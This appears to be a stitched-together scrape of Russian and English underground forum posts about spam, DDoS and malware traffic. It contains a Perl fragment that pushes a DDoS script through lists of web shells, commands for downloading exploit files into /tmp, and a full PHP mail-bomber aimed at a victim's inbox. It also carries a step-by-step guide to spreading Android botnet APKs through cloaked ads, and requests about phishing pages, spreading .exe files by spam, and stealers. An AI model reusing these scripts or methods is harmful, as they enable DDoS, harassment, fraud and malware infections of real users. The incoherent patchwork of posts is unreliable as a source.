our $name = 'ddos.pl';
our $src = 'здесь будет содержаться текст, будь то тело досера, либо проста
Hello Word';
our $dir = '/tmp/';
open(SH,"shell.txt") or die "$!";
chomp(our @sh =
close SH;
foreach(@sh)
{
my $ua = new LWP::UserAgent;
my $res = $ua->request(POST "$_",
[
cmd => "echo $src>$name;perl $name",
dir => "$dir",
submit => ''
]);
if($res->{_rc} =~ /200/) { print "Reply [ok]\n"; }
}
Этот момент мне нравиться тем, что снова не нужно пользоваться уже установленными качалками, а все делается через echo который всегда есть, а wget-ов фетчей и прочих курлов может и не быть либо ограничен к ним доступ.
[6] Рассмотрим средства закачки файлов в unix-like:
which и whereis поможет вам определить местоположение ниже приведенных:
Далее собственно качалки:
wget http://[target]/exploit.c -O /tmp/temlet.txt
fetch -o http://[target]/exploit.c -p /tmp/templet.txt
lynx -source http://[target]/exploit.c > /tmp/templet.txt
links -source http://[target]/exploit.c > /tmp/templet.txt
curl http://[target]/exploit.c -o /tmp/temlet.txt
cd /tmp;pear download http://[target]/exploit.c
GET http://[target]/exploit.c > /tmp/tempet.txt
[7] Ссылки
http://www.ffesys.com/docs/tutorial/perl/google.html
http://n4n0bit.nm.ru/
http://hellknights.void.ru/
[8] THNX: my girl
28.08.2006
собсно сабж. насколько это все эфективно? хочу использовать это для атак, но
хочу узнать стоит ли или нет.
жду мнения
Закон "О рекламе" неэффективен в борьбе со спамом
31 марта 2006 г
Закон "О рекламе" вновь продемонстрировал неэффективность в борьбе со спамом. Новая редакция закона также не станет панацеей: она позволит прекратить или хотя бы ограничить распространение с помощью спама рекламы лишь незаконных товаров и услуг, но не более.
В середине февраля 2006 года рабочая группа проекта "АнтиСпам" направила в Федеральную антимонопольную службу (ФАС) заявления, касающиеся ряда случаев распространения спама с рекламой подделок под швейцарские часы известных марок, приборов для обнаружения "жучков", бухгалтерских и юридических услуг, услуг таможенного брокера, курсов по обучению различным специальностям, а также баз данных ГИБДД, МВД, ФТС, ПФР и др. По мнению заявителя, эти рассылки нарушили положения ФЗ "О рекламе" и других законодательных актов.
Недавно представители ФАС сообщили, что "информация, вносимая пользователями почтовых программ в служебные поля отправляемых электронных писем, не отвечает признакам рекламы... соответственно на эту информацию требования ФЗ "О рекламе" не распространяются". Однако ведомство передало информацию об этих фактах в МВД для проведения соответствующего расследования. Установить в какой именно из департаментов МВД попала эта информация, пока не удалось.
ФАС также дала окончательный ответ на заявление, поданное в 2005 году в отношении рекламы спамерских услуг, распространенной в рассылке с поздравлением с Днем победы. ФАС не посчитала это сообщение соответствующим определению рекламы, данным в ФЗ "О рекламе", и отказалась наказывать рассылателей рекламы.
По мнению координатора проекта "АнтиСпам" Евгения Альтовского, полученные от ФАС ответы свидетельствуют как о нежелании заниматься такой "мелочью", как спам, так и об отсутствии законодательных норм, позволяющих эффективно бороться с его распространением.
"Даже тот спам, который очевидно является рекламой, может не являться ею с точки зрения ФАС, - рассказал г-н Альтовский. - Можно декларировать в ФЗ "О рекламе" сколь угодно строгий запрет на распространение рекламы с помощью спама, однако пострадавшему сначала придется убеждать ФАС в том, что полученный им спам - это именно реклама, и надеяться, что рекламодатель добровольно признается в том, что произвел или заказал рассылку".
Вывод из этого можно сделать один: закон "О рекламе" ни в действующей редакции, ни в новой, которая должна вступить в силу 1 июля 2006 года, не содержит реальных и эффективных инструментов для противодействия распространению спама. "Возможно, с помощью ФАС и МВД нам удастся прекратить или хотя бы ограничить распространение с помощью спама рекламы незаконных товаров и услуг. Однако на большее рассчитывать не приходится, для этого необходимы реальные законодательные механизмы, а не декларации, которые мы имеем сегодня", - заключил г-н Альтовский.
Источник:http://citcity.ru/12115/
DDoS-атака - сокращение от Distributed Denial Of Service Attack. Особенностью данного вида компьютерного преступления является то, что злоумышленники не ставят своей целью незаконное проникновение в защищенную компьютерную систему с целью кражи или уничтожения информации. Цель данной атаки - парализовать работу атакуемого веб-узла. Первые сообщения о DDoS-атаках относятся к 1996 году. Но всерьез об этой проблеме заговорили в конце 1999 года, когда были выведены из строя веб-серверы таких корпораций, как Amazon, Yahoo, CNN, eBay, E-Trade и ряда других, немногим менее известных. Спустя год, в декабре 2000-го "рождественский сюрприз" повторился: серверы крупнейших корпораций были атакованы по технологии DDoS при полном бессилии сетевых администраторов. С тех пор сообщение о DDoS-атаке уже не являются сенсацией. Главной опасностью здесь является простота организации и то, что ресурсы хакеров являются практически неограниченными, так как атака является распределенной.
Схематически DDoS-атака выглядит примерно так: на выбранный в качестве жертвы сервер обрушивается огромное количество ложных запросов со множества компьютеров с разных концов света. В результате сервер тратит все свои ресурсы на обслуживание этих запросов и становится практически недоступным для обычных пользователей. Циничность ситуации заключается в том, что пользователи компьютеров, с которых направляются ложные запросы, могут даже не подозревать о том, что их машина используется хакерами. Программы, установленные злоумышленниками на этих компьютерах, принято называть "зомби". Известно множество путей "зомбирования" компьютеров - от проникновения в незащищенные сети, до использования программ-троянцев. Пожалуй, этот подготовительный этап является для злоумышленника наиболее трудоемким.
Чаще всего злоумышленники при проведении DDoS-атак используют трехуровневую
архитектуру, которую называют "кластер DDoS". Такая иерархическая структура
содержит:
Проследить такую структуру в обратном направлении практически невозможно. Максимум того, что может определить атакуемый, это адрес агента. Специальные мероприятия в лучшем случае приведут к главному компьютеру. Но, как известно, и компьютеры-агенты, и главные компьютеры являются также пострадавшими в данной ситуации и называются "скомпрометированными". Такая структура делает практически невозможным отследить адрес узла, организовавшего атаку.
Другая опасность DDoS заключается в том, что злоумышленникам не нужно обладать какими-то специальными знаниями и ресурсами. Программы для проведения атак свободно распространяются в Сети.
Дело в том, что изначально программное обеспечение DDoS создавалось в "мирных" целях и использовалось для экспериментов по изучению пропускной способности сетей и их устойчивости к внешним нагрузкам. Наиболее эффективным в этом случае является использование так называемых ICMP-пакетов (Internet control messaging protocol), т.е. пакетов, имеющих ошибочную структуру. На обработку такого пакета требуется больше ресурсов, после решения об ошибочности пакет отправляется посылающему, следовательно достигается основная цель - "забивается" трафик сети.
За годы это программное обеспечение постоянно модифицировалось и к настоящему времени специалисты по информационной безопасности выделяют следующие виды DDoS-атак:
Естественно, наиболее опасными являются программы, использующие одновременно несколько видов описанных атак. Они получили название TFN и TFN2K и требуют от хакера высокого уровня подготовки.
Одной из последних программ для организации DDoS-атак является Stacheldracht (колючая проволока), которая позволяет организовывать самые различные типы атак и лавины широковещательных пинг-запросов с шифрованием обмена данными между контроллерами и агентами.
Конечно же, в этом обзоре указаны только наиболее известные программы и методики DDoS. На самом деле спектр программ намного шире и постоянно дополняется. По этой же причине достаточно наивным было бы описание универсальных надежных методов защиты от DDoS-атак. Универсальных методов не существует, но к общим рекомендациям для снижения опасности и уменьшения ущерба от атак можно отнести такие меры, как грамотная конфигурация функций анти-спуфинга и анти-DoS на маршрутизаторах и межсетевых экранах. Эти функции ограничивают число полуоткрытых каналов, не позволяя перегружать систему.
На уровне сервера желательно иметь вывод консоли сервера на другой IP-адрес по SSH-протоколу для возможности удаленной перезагрузки сервера. Другим достаточно действенным методом противодействия DDoS-атакам является маскировка IP-адреса.
Весьма важным делом в этом направлении является профилактика - программное обеспечение должно быть "отпатчено" от всевозможных "дыр".
Как уже отмечалось, обнаружить виртуальных террористов, организовавших DDoS- атаку, задача очень сложная. Поэтому для борьбы с данным видом угроз необходимо тесное сотрудничество администраторов серверов и с интернет- провайдерами, а также провайдеров с операторами магистральных сетей. Потому что, как и в реальной жизни, бороться с терроризмом возможно только объединением законопослушных граждан.
Источник: www.hostinfo.ru
Привет. Меня интересуют методы борьбы со спамом... Точнее не просто методы, а технологии. Ну, например, Баесовые фильтры, которые математическими методами определяют с помощью "базы знаний" с какой-то вероятностью среди новой корреспонденции спам.
Вот меня и интересуют такие методы-технологии. Пишите своими словами, ссылки на подобные статейки кидайте, сами описывайте. Можете так же перечислять методы обхода спам фильтров, это тоже очень интересная инфа. Вообщем, все что с этой темой связано интересует.
Ссылки на проги не нужно кидать, меня интересует именно принцип их действия, а не конечный продукт. Спасибо!
P.S. От себя пару интересных статеек по теме кину
http://www.spamtest.ru/document.html?conte...932&pubid=19234
http://www.spamtest.ru/document.html?conte...932&pubid=19220
как выставьит права на басе.тхт - 666 ? чото не пониал.., закачеваиу ево через фтп, и как выставьит права на басе.тхт ?
спосиба зарание.
PHP реализация меил бомбера. Юзаем наздоровье.
Не забываем настроить скрипт в коде. Думаю объяснять не надо.
Code:Copy to clipboard
<?
function fux($str) {
$i = 0;
while ($i < strlen($str)) {
$s = $str{$i};
$r = rand(0,9);
if ($r > 4) { $o = $o.strtoupper($s); }
else { $o = $o.strtolower($s); }
$i++;
}
return $o;
}
function hax($str) {
$i = 0;
$from = array('a','e','i','l','o','s','t');
$to = array('4','3','1','1','0','5','7');
while ($i < strlen($str)) {
$s = $str{$i};
$r = rand(0,9);
if ($r > 4) { $o = $o.str_replace($from,$to,$s); }
else { $o = $o.$s; }
$i++;
}
return $o;
}
function rx($str) {
$r = rand(0,1);
if ($r) { $str = hax($str); }
else { $str = fux($str); }
return $str;
}
function r($len) {
$r = rand(0,1);
if ($r) { $o = chr(rand(65,90)); }
else { $o = chr(rand(97,122)); }
$i = 1;
while ($i < $len) {
$i++;
$r = rand(0,2);
if ($r) { $o = $o.chr(rand(65,90)); }
elseif ($r == 1) { $o = $o.chr(rand(97,122)); }
else { $o = $o.rand(0,9); }
}
return $o;
}
function gettok($str,$tok,$chr) {
$str = explode(chr($chr),$str);
if (substr($tok,1) == '-') {
$rest = TRUE;
$tok = substr($tok,0,-1);
}
$tok--;
if ($rest) {
for ($i = $tok; $i < count($str); $i++) { $newstr = ($newstr) ? $newstr.chr($chr).$str[$i] : $str[$i]; }
return $newstr;
}
else { return $str[$tok]; }
}
if ($_POST['to'] && $_POST['t'] && $_POST['len']) {
echo '<hr />'."rn";
$to = $_POST['to'];
$t = $_POST['t'];
$len = $_POST['len'];
if ($_POST['s']) { $s = $_POST['s']; $sub = $s; }
$i = 0;
// -------------------------------------------------------------
// EDIT THIS PART FOR... FOR... MORE FUN =D
// -------------------------------------------------------------
$nameList[] = rx('CHANGE THIS');
$nameList[] = rx('CHANGE THIS');
$nameList[] = rx('CHANGE THIS');
$nameList[] = rx('CHANGE THIS');
$nameList[] = rx('CHANGE THIS');
$nameList[] = rx('CHANGE THIS');
$nameList[] = rx('CHANGE THIS');
$nameList[] = rx('CHANGE THIS');
// U can add more names here, just for fun
$emailList[] = 'email_to_send_from_1@hotmail.com';
$emailList[] = 'email_to_send_from_2@hotmail.com';
$emailList[] = 'email_to_send_from_3@hotmail.com';
$emailList[] = 'email_to_send_from_4@hotmail.com';
// U can add more emails here. Put any email u want ^^
// -------------------------------------------------------------
while ($t > $i) {
$i++;
$c = count($nameList);
$r = rand(1,$c) - 1;
$name = $nameList[$r];
$c = count($emailList);
$r = rand(1,$c) - 1;
$email = $emailList[$r];
$headers = "MIME-Version: 1.0rn";
$headers .= "Content-type: text/html; charset=iso-8859-1rn";
$tt = explode('@', $to);
$headers .= "To: " . $tt[0] . " <" . $to . ">" . "rn";
/*
$r = rand(0,9999);
$m1 = md5($r);
$r = rand(0,9999);
$m2 = md5($r);
$email = $m1.'@'.$m2.'.com';
*/
$headers .= 'From: '.str_replace('-',' ',$name).' <'.$email.'>' . "rn";
if ($i == 1) {
if (!$s) { echo '_DATA 01 '.$to."rn"; }
else { echo '_DATA 01 '.$to.'?'.$s."rn"; }
}
$m = r($len);
if (!$sub) { $s = r(rand(30,46)); }
else {
$s = gettok($sub,'2-',63);
$s = str_replace('-',' ',$s);
if (gettok($sub,1,63) == hax) { $s = hax($s); }
elseif (gettok($sub,1,63) == fux) { $s = fux($s); }
elseif (gettok($sub,1,63) == rx) { $s = rx($s); }
else { $s = $sub; }
}
$mail = mail($to,$s,$m,$headers);
if ($mail) { echo '_DATA 02 i++?'.$len.'?'.$name.'?'.$email.'?'.str_replace(' ','-',$s)."rn"; }
else { echo '_DATA 03 err0r'."rn"; }
}
echo '_DATA 04'."rn";
}
else {
echo '_DATA 05'."rn";
echo '<form action="'.$_SERVER['PHP_SELF'].'" method="post">
<table width="60%" cellspacing="1" cellpadding="3" border="0" align="center">
<tr>
<th colspan="2">Made by Ali sar</th>
</tr>
<tr>
<td>Victims Email:</td>
<td><input name="to" type="text" value="Enter the ~censored~ email here" size="30"></td>
</tr>
<tr>
<td>Number of Bombs:</td>
<td><input name="t" type="text" value="5000" size="30" /></td>
</tr>
<tr>
<td>Keep this 1 for fastes send:</td>
<td><input name="len" type="text" value="1" size="30" /></td>
</tr>
<tr>
<td>Subject (optional):</td>
<td><input name="s" type="text" value="Enter your message here" size="30" /></td>
</tr>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" value="Bomb Them All" /></td>
</tr>
</form>'."rn";
}
?>
Народ у кого какие мысли по теме, условие что физического доступа к телефону жертыва небудет...
нужно досадить одному нехорошему человеку. :holloween:
Собственно ищу советов по спаму в данном направлении, спам точечный, обычно
10-20 контактов в сутки. В блок отлетают бизнес аккаунты за 3-4 мессаджа.
Сообщения доходят но от жалоб быстро отлетают (даже от нескольких). Шлем
обычно текст иногда крепим ссылки на гдрайв
Вот вопросы:
1. есть ли смысл переходить на спам смс (насколько это эффективно в ЮСЕ)
2. как держать бизнес акк вотсапа от абуз, есть ли смысл юзать тг?
3. Как приложухи относятся к эмуляторам (фраудскор)?
Hidden content for authorized users.
You must have at least 10 reaction(s) to view the content.
Слив курса Нашиба,буду благодарен за лайк)
Облако Mail.ru - это ваше персональное надежное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-13146-95-3-1.202203251209%2Ffavicon.ico&hash=71e7417059002c591023fa5d86275c32&return_error=1) cloud.mail.ru
На zennolab стартовал 16-й конкурс статей.
Не пропустите статью с шаблоном для ZP о получении трафика с смс рассылки -
Как отправить миллионы смс меньше чем за $10.
Читайте статью и забирайте шаблон здесь - https://zenno.link/MDA1H
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/rKpA1AZb#IFYtYw_B1rv_PvEmMRquuw)
mega.nz
Всем привет!
Хочу поделиться актуальным на 2022 год мануалом по мотивированному трафику. Материал в мануале изложен в виде двух супер-прибыльных кейсов, с комментариями автора.
Инфа очень полезная и новая, можно вписаться в тему и начать зарабатывать. Инфы из мануала для старта хватит.
Ссылка на сам мануал:[От 70 000 рублей на мотивированном трафике в 2022 году](https://telegra.ph/Ot-1000-dollarov-na-motivirovannom- trafike-v-2022-godu-05-19)
вопрос в шапке заранее всем спасибо
У меня есть созданный фишинг по сбору данных логина и пароля американского
банка. Люто банит домен в течении часа после того как загружаю сайт на
хостинг.
Подскажите пожалуйста кто сталкивался
**Сегодня в этой статейке поведаю вам о новом способе залива трафика через
Telegram ads.
Статью делить на части не стану, поэтому сразу скажу свое коронное: ПОЕХАЛИ!
1. **Врываемся с двух ног на сайт телеграмма https://promote.telegram.org/
2. Логинимся на нем через наш телеграм аккаунт. по кнопке "Log In"
[![[IMG]](/proxy.php?image=https%3A%2F%2Fnztcdn.com%2Ffiles%2F008f53e7-c0a0-48dc-
aeb0-3452804fde4d.webp&hash=668050bb3a5aada2dcf202cf5aac5437)](https://nztcdn.com/files/008f53e7-c0a0-48dc-
aeb0-3452804fde4d.webp)
3. Тыкаем по нашему телеграм аккаунту.
4. Вписываем суда все на рандом.
**Поясняю, что здесь написано:
1. Ваше имя.
2. Почта.
3. Номер телефона.
4. Страна
5. Город
6. Имя рекламодателя.
5. **Заполнили. На тяп ляп. Поехали дальше.
Вот такоеглавное меню у нас вылезает. Пополняем наш балик, тыкая на баланс
в верхнем правом углу.
Снова заполняем все. Поясняю что здесь написано:
1. Какие товары будем рекламировать либо сайт/услуги.
2. Язык ваших рекламок, заполняем на страну, которую лить будете.
3. Годовой бюджет. Пишите на рандомчик.
4. Можете не писать ничего.
Отправляем заявку и ждем.
**Далее вам одобрят заявку на пополнение баланса и вы сможете покупать
рекламу.
Далее показываю и объясняю, что как заполнять скриншотом ниже:
**
**
Рекомендую: **ставить оплату за 1000 просмотров от 0.5 евро до 1 , т.к. это выйдет вам в копейку и трафф будет не такой хороший. Почему? Потому что мы ориентируемся на людей, которые так и хотят залутать себе халявный скинчик в CS2. Если же мы поставим цену за 1000 просмотров больше - будут смотреть те, кто не будет нуждаться в скинах.
Как лить какую страну? Думаю сами разбиретесь, да и форсить не стану.
Данный способ еще не такой заезженный как другие и им мало кто пользовался,
тот же ВК хоть и дешевле, но по траффу и удобству будет - хуже.
Статья взята с зеленке.
Взять канал "Mash" часто вижу рекламу крипты - скам конкретный)
Всех приветствую.
Пасаны, есть тут кто шарит в арбитраже трафика с ФБ или гугла с каржа? Не на
стиллеры, а именно на офферу реклов?
Сам арбитраж и настройки рекл кабинетов и тд меня не интересуют.
Интересует именно как и что вяжется из картона или ба к рекл кабинету ФБ или гугла.
Понимаю что прошу, поэтому хотя бы просто немного пищи и направлений для размышлений было бы очень круто получить. Инфы такой мало. Может подскажет кто где покопать.
С уважением
Привет, подскажите пожалуйста, чтобы обойти биржу, чтобы не получить бан при проливе. С чем нужно склеивать лоадер?
Ищу помощи специалиста по SMTP.
В двух словах о моей проблемке .
Есть софт (LetsExtract Email Studio Business) (Email Checker Pro) (SendBlaster
Pro) всё лицензия .
Есть хорошие свежие базы чекнутые на валид .
Подскажите где взять , найти
, купить - хорошие SMTP ???
Чтоб всё летело в inbox .
Hi, does anyone here have an info about any reliable email bombing service?
I need it urgently.
Всем привет, набрёлся на сайт с комбайном для Telegram и увидел что там дают
целый месяц бесплатного теста софта.
Очень удивился этому, потому как стоят они от 15к до 25к, а месячная лицензия
обычно около 7-10к.
Что нужно для получения?
1. Заходим на https://telegrand.info
2. Скачиваем программу
3. Запускаем и копируем свой UUID
4. Отправляем саппорту в телеграм, и он выдаёт ключ активации на месяц (тг
указана на сайте)
5. Пользуемся
Ещё можно попытаться абузнуть эту тему, и получить много месячных ключей - главное чтобы был разный UUID (комп по факту). Ключ начинает действовать с момента активации в софте, даже если вы и получили его но не активировали можно будет и через пол года активировать. Как монетизировать это я думаю не стоит обьяснять)
Посдкажите какой курс посмотреть что бы научится трафику/загрузкам.
Понимаю есть много направлений, хочется рассмотреть общирный курс, дабы
применить его уже к серой/черной теме.
Всем привет. У меня возникла острая проблема с рекламой запрещенного контента: в телеграмме меня забанили в группах, дали ограничение. Посоветуйте еще способы получения траффика.
Онлайн СМС спамер написан на питоне.
https://repl.it/@Quessts/AK-47#main.py
Вам нужно просто нажать клавишу START что в самом верху.
Прогрузится консоль
Вводим номер
Радуемся злости врагов )
Вои и его исходник
Throwbin is a website where you can store text online for a set period of time.
throwbin.io
Привет,
Я пытаюсь скрыть свой URL-адрес оболочки (например, toiletpaperonline.com). Я нахожу, что у кого-то есть это решение, но я не понимаю, как он это сделал.
anonfiles (.) com/b0Vfbb6bud/photo_2021-07-12_15-08-12_jpg
Язык - английский.
Регион - мир, кроме снг.
Зарплата - высокая, сдельная.
Что нужно? - Спам мыл, спам соцсетей и мессенджеров, смс-спам, написание
статей (англ) и пролить траф, любой ваш метод раскрутки и привлечения юзеров.
Детали в телеге.
@Courier_Market
@Courier_Market_Affiliate
Сабжект, оплата высокая!
Предлагаем вашему вниманию "Аккаунты Телеграм (авторег) USA/RU
САМЫЕ БОЛЬШИЕ****ОБЪЁМЫ
ЖИРНЫЕ СКИДКИ НА ОПТ
ВЫСШЕЕ КАЧЕСТВО
ОБНОВЛЕНИЯ КАЖДЫЙ ДЕНЬ
Мы делаем каждый день по 30 - 40к аккаунтов, все учетные записи с гарантией
Предоставляем аккаунты на тест
Продажа от 10 единиц
Так же для вас предоставляем услуги по продвижению в телеграм (спам,
инвайтинг, просмотры) и подключение к приватным прокси
(click)
Техническая поддержка
Вся подробная информация об аккаунтах / услугах / ценах указанна выше
У меня были некоторые, мне нужен хороший взломанный или бесплатный инструмент для массовой рассылки, который может правильно проверять почту, потому что у меня очень плохие показатели отказов, пожалуйста, предложите, будут ли вам полезны какие-либо ссылки
Как залить шел , не имея доступа к file manager ,
Главный критерий это живучесть ботов.
Надо отправлять ботов в сейв. Трафик большой не успеваю обработать всех.
Хочется засейвить их что бы потом можно было прогрузить что то туда.
слышал смок вроде как еще актуален, есть смысл его брать или есть более лучшие
альтернативы.
hello community I need help from you I have been trying to spread .exe through
spam for several months but I have not obtained good results.
I have already tried to put compress the exe with password and it has not
worked.
I have used the BlackTds camouflage and have not had good results either. I
thank you and help me, since it is very valuable to me, I live off spam and at
the moment I don't know what to do
Добрый день, появилась возможность на постоянной основе собирать базы под рассылку и соответственно организовывать саму рассылку. Речь идет как про email так и об sms рассылке
Пока еще нет опыта в реализации данных возможностях, и в связи с этим
интересует инфо по расценкам:
база email собранных с форм отклика на сайтах (mix страны) за 1000шт (не
паблик, полный уник)
база номеров в среднем за usa/europe/asia за 1000шт (не паблик, полный уник)
и так же стоимость рассылки по данным направлениям.
Все это реализовано на нескольких сервисах, которые уже показали + на тестах, но без масс заливов. Себестоимость только покупка качественных прокси(для сервисов), поэтому и стал интересен выбор данного направления. Если есть люди с проксями/опытом и депозитом на форуме, готов провести тесты на ваши офферы бесплатно(в частности хотел бы пообщаться с вебмастерами работающими не только с google и fb)
если есть такие, готов заказать рассылку.
Так же у меня присутствует рандомизация текста и заголовки, спамлю без файлов,
просто текст.
Ive got a legitimate site that I want to boost but I keep hearing that all the black hat seo methods dont work anymore. Are there any that still reliably get your page up google?
Подскажите в чем может быть проблема?
Все по стандарту делаю:
Два ленда, белый и черный. Блек тдс.
Прохожу модерацию, на белом потом вставляю код в белый ленд. ссылку на скачку
апка тоже скрываю с помошью блек тдс. И в черный ленд код вставляю чтоб не
попали на него боты и модеры.
Статистика тдс показывает допушенные переходы, из которых установки должны
быть полюбому. Биржы юзал разные, все стоит колом, не идут установки и все.
Сервак чистый, домены новые, аки на биржах новые, использую прокси. Пополнял
аки с разных платежных систем.
Оба ленда сам переделывал, уникализировал их.
Все цепочка технический работает, проверяю с помошью тдс, все качается, все
перенаправляет куда надо, апка чистый/ стучит.
В чем косяк?
I have hugelist but I need to verify the list and send them spamming email
SMTP gets blocked or spammed soon enough so how can I use gmail as SMTP and
which email marketing software will do job and how to maintain high inbox
rates
Any help ?
Дорогие друзья хотелось бы у вас спросить совет в сфере майнера в котором не знаком я, кто как/чем льет боты на майнер купил майнер на форуме нашем для монеро и эфира
лью трафик хотелось бы узнать чем можно вапще кроме трафика вопрос задаю потомучто хочу купить трафик на 20к$ может есть по лучше варианты дайте совет друзья благодарен заранее.
i have been searching and doing the research in this topic for past 2 monthd
no help yet i have used several tools like antibot7s, letter encryptor, html
encryptor no luck yet as i can see the letter when i open from my device to
normal browser but when i send it to victim it gets into spam every time and
not visble (Blank asking For javascript sometimes) visible only when i dont
use any encryption tools on it, else when i use encryption tools the letter is
either not visible in victims inbox or not coming in inbox or get to the spam
folder. any possible way to send my letters to victim inbox directly as i use
good smtp also like gmail, office365 and all.
Thank You In Advance
Всем привет, зарегался на данном форуме, так как тут люди сидят знающие и
много кто за это скорее всего шарит и сможет мне подсказать.
В общем, мне нужна рассылка от 500-1000 писем с любой почты(доменной или ещё
какой-то) ТОЛЬКО на gmail почты, при этом, без красных табличек(скрин
приложил), а спам это уже отдельная тема.
Желательно если кто-то может как-то спуфать письма и чтобы обойти данную
красную табличку(которая возникает из-за лимита отправленных писем, то есть
например если отправить с чистой гмайл почты 10 штук писем на другие гмайл
почты, то через время, а буквально через час прилетает так называемая красная
табличка, а после это письмо с легкостью может уйти в спам и вот мне надо
обойти эту табличку)
Если кто может это осуществить - пишите здесь или пишите мне в телегу
@xsssonic (указываете цену)
Та самая так называемая красная табличка -
Уважаемые форумчане!
Не судите строго, только начал изучать арбитраж трафика. Заинтересовал метод
СPI ( оплата за инсталлы). Допустим я регистрируюсь в партнерке, в телеграме у
меня есть аудитория, готовая устанавливать приложения согласно офферам. Жива
ли данная схема? Может есть кто среди вас, кто поможет мне в начале этого
дела, обговорим ваги условия
Хай народ), есть у кого крякнутый ZennoPoster?
Помню точно что кто то сюда уже сливал по поиску найти не могу, если что
киньте ссылкой.
Заранее спасибо.
Всем привет! Недавно (примерно с конца ноября) гугл начал люто банить все и вся. Но есть и другая ситуация, связанная с ручными проверками. Реклама крутиться день-два, происходит списание (лью с первобиллов 300е) и акк снова уходит на ручную проверку. В причинах почему мое объявление не показывается сказано "В данный момент мы не можем определить почему ваше объявление не показывается в данный момент" . Пишешь в ТП ,а в ответ "У вас низкий рейтинг объявлений". Хотя это бред полный... У кого на данный момент такая же ситуация? Может подскажет кто какие действия провоцируют ручник?
Столкнулся с задачей: рассылать ежедневно 100-200 писем на конкретные почтовые ящики (каждый раз разные), в основном гмаил, яху, хотмайл. Письмо с ссылкой на трастовый сервис, никакой запрещенки. Единственное что - некоторые получатели жалуются на письма. Важно что бы каждый получатель получил письмо, я готов даже руками рассылать все 100 писем ежедневно, лишь бы знать что они доходят до получателей.
Что порекомендуете почитать что бы получить ответы на вопросы:
Заранее благодарю за ответы
Куплю аккаунты Twilio (НЕ TRIAL)
Контакт в пм!
Кто на форуме продает? Именно спамер а не флудер
или ссылку на хороший продукт на других бордах в лс (отблагодарю)
кидалы и реселлеры - мимо
не тратьте время своё и моё
без темы с отзывами и гаранта ничего брать не буду
Приветсвую.
Столкнулся с такой пролемой. Есть источник который делает инсталлы.
У меня сделан софт (внутри уже есть лоадер, но лоадер создаётся из файлов внутри себя когда зупускается прграмма) и отправляет инфу на сервер. Всё вроде как идёт в защифрованном виде.
Вообще как у всех ) но по своей технологии.
Два раза проливал уже и небыло вопросов, счас биржа пишет что пабы жалуются что мой софт устанавливает типо дополнительный софт - дословно( you are installing other offers along with you offer after some time)
Как я понял какимто образом видят что прога шлёт данные или видят что она создала файл(лоадер).
Знающие люди помогите пожалуйста. Может есть какое решение как обойти замаскировать и. т. п. или кто сталкивался уже.
Ребят , как лучше всего использовать трафик с порно сайтов ?
Фейк магазины игрушек для взрослых ?)
Товарищи, всем привет. Помогите новичку решить следующую проблему:
Зарегался недавно на серверсе e-pay. Хочу пролить бурж трафик на англоязычные опросники. Но столкнулся со следующей проблемой:
Домены всех нормальных офферов (а таких там не много) сильно загажены. Еле
дышат.
Как можно сменть домен оффера?
До владельца оффера достучаться возможности нет. Поддержка тоже молчит второй
день.
Насколько я понимаю, домен должен менять сам оффер. Но может есть какие-то
альтернативные варианты?
П.С. Один человек мне сказал, что на данном ресурсе (е-pay) обязательно нужно использовать TDS (но как его использовать и зачем он нужен - не объяснил - удалил чат и пропал). Вот меня мучают догадки - быть может TDS как-то связан с чисткой домена?
Hi guys im tutoring traff in this post !
PART 1 İNTRO AND PREPARING
First we need A botnet Cerberus Alien Anubis etc
after building apk we need:
Amazon aws s3 Storage service
open a bucket and add your apk to bucket
make your apk public and take your link of apk
now we need a cloacker we can use : lmy.de
Shorten a local newspaper link for starting we will chage it with apk link
after traff campings run
PART 2 TRAFF CAMPING
+++ Open a traff website account and add balance
notice : you can charge balance with debit card & otp on lots of traffing site
CC with otp or BTC Payments possible too
TRAFF SITE EXAMPLES
](https://hilltopads.com/)
HilltopAds: Global ad network offering high-performance solutions for advertisers and publishers. Boost your campaigns and revenue with us.
hilltopads.com
clickadu.com
joinpropeller.com
,,,,MAKE A PUSH NOTIFICATION CAMPING ,,,,
it will want 2 pics from you
1 for icon (you can use google play icon etc )
1 for ad camping (Free Iphone 11 or Money Pics are best )
Be sure to using an effective image for ads
Select your target country and device os
pricing :
select cpm 0.1 $ for clicks
you can get %8-10 performance on clicks
for example 1000 clicks brings 80-100 bots
create camping and copy it 5-6 times
PART 3 -FINAL
now you have to change your shorten url with your apk link
open lmy de click dashboard and found your newspaper link
click to edit and change base url with ur amazonaws apk direct download link
and save it !!!!!!!!
PART 4
Now you have to wait for installs now
thx for read
Дорого времени суток, подскажите в какую сторону смотреть при выборе лендинга
под слив на стилерр, на какую вертикаль?
Буду благодарен полезному совету от логоводов, заранее спасибо.
Hey fellows,
Since I was using Contabo for VPS, they sent me several warnings regarding spamming. Through this topic, I would like to know the best VPS providers at the moment, who are not that sensitive regarding spamming or they are cheap.
I hope the idea is clear.
Bests,
Интересует вопрос. После установки powermta или postfix на сервер стоит ли
проверять и менять служебные заголовки письма?
Или достаточно spf/dkim/чистого ip сервера?
Влияют ли хедерэ на инбокс?
Сабж в теме, необходимы вот эти 2 софта - https://listmate.com/
2ой - https://www.emeditor.com/
Поделитесь пожалуйста.
Всем день добрый, небольшое предисловие - несколько недель назад принял
решение разительно сменить сферу деятельности и занятся спамом. Но, честно
сказать, довольно грустно разбиратся в теме с 0 без товарищей, которые пылают
энтузиазмом так же, как и я.
Поэтому разыскиваю несколько человек, желательно кого то с опытом, кто
действительно занимается этим, или же таких же новичков как и я. Главное
настрой на результат - знакомы мне истории когда люди лишь делают вид, что чем
то занимаются. Нужен результат за ближайшие недели, поэтому я с этим
разбираюсь почти все время, что есть.
Думаю что 4-5 человек будет более чем достаточно для такой компании.
Никакой коммерции внутри группы, обьеденение чисто на энтузиазме и желании
освоить новый инструмент по привлечению трафика.
Если есть желание поучаствовать, то в лс скиньте мне краткое резюме, уровень
понимания темы и зачем вам это нужно.
Спасибо за внимание.
ЗЫ
Пока нашлись ребята, попробуем пару дней, посмотрим что из этого выйдет, пока
писать больше не нужно. Всем спасибо, всем удачи.
Привет, я представляю прямого рекламодателя по Крипте (топовые оффера).
Если у вас есть аккаунты FB/ Google и вы знаете, как рекламировать Blackhat - вы можете хорошо зарабатывать с нами.
